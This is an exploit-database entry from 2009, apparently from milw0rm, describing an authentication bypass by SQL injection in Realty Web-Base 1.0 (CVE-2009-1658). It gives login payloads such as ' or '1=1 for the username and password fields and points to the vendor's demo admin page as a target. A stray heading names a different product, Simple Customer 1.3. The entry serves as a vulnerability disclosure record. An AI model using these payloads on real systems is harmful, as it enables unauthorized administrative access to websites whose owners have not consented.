[] NeoSense

Realty Web-Base 1.0 - Authentication Bypass

Author: ThE g0bL!N
type: webapps
platform: php
port: 
date_added: 2009-05-07 
date_updated:  
verified: 1 
codes: OSVDB-54372;CVE-2009-1658 
tags: 
aliases:  
screenshot_url:  
application_url: 

---------------------------------------------------------------
------------------------------------------------------------
Realty Web-Base v1.0 (Auth bypass) SQL Injection Vulnerability
---------------------------------------------------------------

Founder : ThE g0bL!N
Home:WwW.h4ckF0u.CoM
Vendor:http://www.realtywebware.com
---------------------------------------------------------------
---------------------------------------------------------------

Simple Customer 1.3 SQL Injection Vulnerability
------------------------------------------------
username :' or '1=1

Password: ' or '1=1
         Or
username:[admin_name]' or '1=1


password: Nothing
--------------------------------------
Dem0
----
http://www.realtywebware.com/demo/admin/

--------------------------------------

Greeting To ALL My Friends (Dz)

# milw0rm.com [2009-05-08]